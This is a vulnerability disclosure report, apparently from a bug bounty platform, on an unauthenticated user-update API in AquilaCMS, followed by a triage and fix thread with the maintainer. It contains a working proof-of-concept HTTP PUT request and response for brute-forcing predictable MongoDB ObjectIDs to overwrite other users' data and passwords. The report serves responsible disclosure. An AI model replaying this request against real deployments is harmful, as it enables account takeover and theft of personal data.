Incorrect Use of Privileged APIs in aquilacms/aquilacms
Reported on
Aug 1st 2021
✍️ Description
Unauthenticated API function allows any user to change OR view another user first name, last name, password, and address information. As well, leaked activateAccountToken and resetPassToken can be viewed.
🕵️♂️ Proof of Concept
The attacker can guess the correct MongoDB_object ID and it is not secured and leaked during registration. The attacker once obtains one valid Object_id can use the linked GitHub repo to generate other users' object_id. Using the following API call, the attacker does not need to be logged in and would brute force the _id parameter;
Variables: { IP }, { ID_TO_GUESS }
PUT /api/v2/user HTTP/1.1
Host: { IP }:3010
Content-Length: 245
Accept: application/json, text/plain, */*
lang: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://{IP}:3010
Referer: http://{IP}:3010/account
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
{"delivery_address":1,"billing_address":0,"isActiveAccount":false,"_id":" { ID_TO_GUESS }","civility":1,"lastname":"whatever20","firstname":"whatever","email":"admin2@admin2.aaa","preferredLanguage":"en","fullname":"whatever whatever10"}
Response:
HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
Set-Cookie: cookie_notice=false; Path=/; Expires=Mon, 01 Nov 2021 22:16:10 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 1037
ETag: W/"40d-F8j15BnKHmYafwqqrsJh8golXDg"
Date: Sun, 01 Aug 2021 22:16:11 GMT
Connection: close
{"code":"USER_UPDATE_SUCCESS",
...
....
💥 Impact
An attacker can gain all information about any user, leaking addresses, addresses, and tokens. As well, can overwrite this information, and change another user's password. Total Account compromise is possible through this one API call.
🩹 Remediation
Do not use MongoDB object ID as the ID for user accounts, instead of a randomized, 32-byte string, or specially uuid's. Ensure that users using the API are authenticated!
📍 Location
users.js#L86
📝 References https://github.com/andresriancho/mongo-objectid-predict 📍 Location users.js#L86 📝 References https://github.com/andresriancho/mongo-objectid-predict
Great job on your disclosure!
As you can see, we have made contact with the maintainer via a GitHub Issue and are waiting to hear back from them (i.e. to create a SECURITY.md) so that we can share a magic link with them where they can validate or invalidate this disclosure.
Hey SmashSnacks, the maintainers got back to us by email, asking us to fill out a form. I've gone and done that for you, so we're just waiting for their response now. Good job!
@admin, now that this is validated, is it possible to submit for CVE?
Thanks for this "disclosure bounty". We'll fix this in the next days
@SmashSnacks - we are currently building out our automated CVE system. Once this is live, it will back assign for all applicable vulnerabilities.
Yes ! https://github.com/AquilaCMS/AquilaCMS/pull/164
But I cannot mark as fixed (huntr bug)
@maintainer - could you please resolve the report by marking the report as fixed?
You can do this by clicking Resolve below 👍
What is the issue you are seeing when trying to mark it as fixed?
Can you confirm which version has the patch been applied to? I can then help you mark the report as fixed 👍